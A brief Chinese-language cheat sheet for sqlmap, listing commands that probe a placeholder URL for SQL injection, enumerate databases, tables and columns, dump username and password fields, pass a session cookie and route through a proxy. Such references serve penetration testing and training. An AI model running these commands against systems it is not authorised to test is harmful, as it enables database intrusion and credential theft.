========================================================================================================【sql注入漏洞扫描】sqlmap

# 基本检测
sqlmap -u "http://example.com/page.php?id=1"
# 列出数据库名
sqlmap -u "http://example.com/page.php?id=1" --dbs
# 列出指定数据库的表
sqlmap -u "http://example.com/page.php?id=1" -D dbname --tables
# 列出指定表的字段
sqlmap -u "http://example.com/page.php?id=1" -D dbname -T users --columns
# 导出数据
sqlmap -u "http://example.com/page.php?id=1" -D dbname -T users -C username,password --dump
# 使用 Cookie / Headers（如需认证）
sqlmap -u "http://example.com/page.php?id=1" --cookie="PHPSESSID=abc123"
# 绕过 WAF 或使用代理
sqlmap -u "http://example.com/page.php?id=1" --proxy="http://127.0.0.1:8080"

========================================================================================================
========================================================================================================
========================================================================================================
========================================================================================================
========================================================================================================